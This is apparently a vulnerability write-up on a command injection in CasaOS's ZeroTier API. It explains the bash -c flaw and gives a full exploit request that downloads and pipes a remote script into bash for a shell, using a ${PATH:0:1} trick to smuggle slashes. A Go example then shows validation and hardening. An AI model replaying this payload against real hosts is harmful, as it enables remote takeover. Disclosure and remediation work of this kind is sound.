description
A command injection in the latest CasaOS release that gives the attacker a shell on the host. All versions are affected.
analysis
CasaOS exposes an API for managing the host's ZeroTier networks; the ZeroTier network id is taken from the request path.
In the ZeroTier service this id is concatenated into a command string, which is then run through command2.OnlyExec.
OnlyExec works as shown below: it hands cmdStr to /bin/bash -c, so whatever the string contains is executed as a shell command, metacharacters included.
package command // package name assumed; the page imports it as command2

import "os/exec"

// OnlyExec runs cmdStr through /bin/bash -c. Nothing is escaped, so any
// shell syntax in cmdStr (here: the zerotier id joined from the URL path)
// is interpreted by bash. Errors from Start/Wait are silently dropped.
func OnlyExec(cmdStr string) {
	cmd := exec.Command("/bin/bash", "-c", cmdStr)
	stdout, err := cmd.StdoutPipe()
	if err != nil {
		return
	}
	defer stdout.Close()
	if err := cmd.Start(); err != nil {
		return
	}
	cmd.Wait()
	return
}
exploit
First, log in to the dashboard: the API requires a user's token (the Authorization header in the request below).
Then intercept any request with Burp Suite and change the path to /v1/zerotier/leave/xxx, where xxx is the injected id. Because the id is a single path segment, it cannot contain a slash, so we write ${PATH:0:1} instead: bash expands it to the first character of $PATH, which is "/". The leading 1|| makes bash fall through to our curl ... | bash pipeline when the zerotier command for the bogus id 1 exits non-zero.
POST /v1/zerotier/leave/1||curl%20http:${PATH:0:1}${PATH:0:1}youvpsip${PATH:0:1}1.txt|bash HTTP/1.1
Host: api.localhost.casaos.zimaboard.com:8089
Accept: application/json, text/plain, */*
DNT: 1
Language: en
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJ6aW1hYm9hcmQiLCJleHAiOjMzMTY3MDA3NzE5LCJpc3MiOiJnaW4tYmxvZyJ9.eExCLxt8k6ATdaaYrFUVY-c6y_Itmn3U-xGQXodqiUM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Referer: http://api.localhost.casaos.zimaboard.com:8089/ui/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,ja;q=0.7
Cookie: pma_lang=en; phpMyAdmin=b9q9oik4hdj17b3a1aoijvae4k
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Finally we get the shell.
patch
- Validate input before it goes anywhere near an OS command: the id should be rejected unless it looks like a ZeroTier network id (16 hex characters).
- Better still, do not go through /bin/bash -c at all. Pass the id as a separate argv element to exec.Command so the shell never parses it; escaping is then unnecessary.
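To make the analysis and the patch concrete, here is an added example (not CasaOS code) that puts the vulnerable string join next to a hardened version. The exact zerotier-cli invocation CasaOS builds is an assumption; the payload string is constructed from the request above.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// vulnerableLeaveCommand mirrors the pattern described in the write-up:
// the path parameter is glued into a string that OnlyExec hands to
// /bin/bash -c. "zerotier-cli leave" is an assumed command; the point is
// the concatenation, not the exact binary.
func vulnerableLeaveCommand(id string) string {
	return "zerotier-cli leave " + id
}

// ZeroTier network ids are 16 hexadecimal characters; anything else is
// rejected before a command is even built (allow-list, not blacklist).
var networkIDRe = regexp.MustCompile(`^[0-9a-fA-F]{16}$`)

var ErrBadNetworkID = errors.New("invalid zerotier network id")

// safeLeaveArgs validates the id and returns an argv slice. Each element is
// passed to exec.Command directly, so no shell ever parses attacker input.
func safeLeaveArgs(id string) ([]string, error) {
	if !networkIDRe.MatchString(id) {
		return nil, ErrBadNetworkID
	}
	return []string{"zerotier-cli", "leave", id}, nil
}

// safeLeave runs the validated command without /bin/bash -c.
func safeLeave(id string) error {
	argv, err := safeLeaveArgs(id)
	if err != nil {
		return err
	}
	return exec.Command(argv[0], argv[1:]...).Run()
}

// hasShellMetachars is what a naive "filter the input" blacklist looks like.
// It catches this payload, but an allow-list on the id format is simpler to
// reason about and does not need to know every bash trick (e.g. ${PATH:0:1}).
func hasShellMetachars(s string) bool {
	return strings.ContainsAny(s, "|&;$`<>(){}\n")
}

func main() {
	// Constructed from the exploit request in the write-up.
	payload := "1||curl http:${PATH:0:1}${PATH:0:1}youvpsip${PATH:0:1}1.txt|bash"

	fmt.Println("vulnerable cmdStr:", vulnerableLeaveCommand(payload))
	if _, err := safeLeaveArgs(payload); err != nil {
		fmt.Println("hardened version rejects payload:", err)
	}
	argv, _ := safeLeaveArgs("8056c2e21c000001") // well-formed id, made up for the example
	fmt.Println("hardened argv:", argv)
}
```

safeLeave is not invoked by main, so the example runs without zerotier-cli installed; drop it into a handler and call it with the path parameter to see the hardened behaviour end to end.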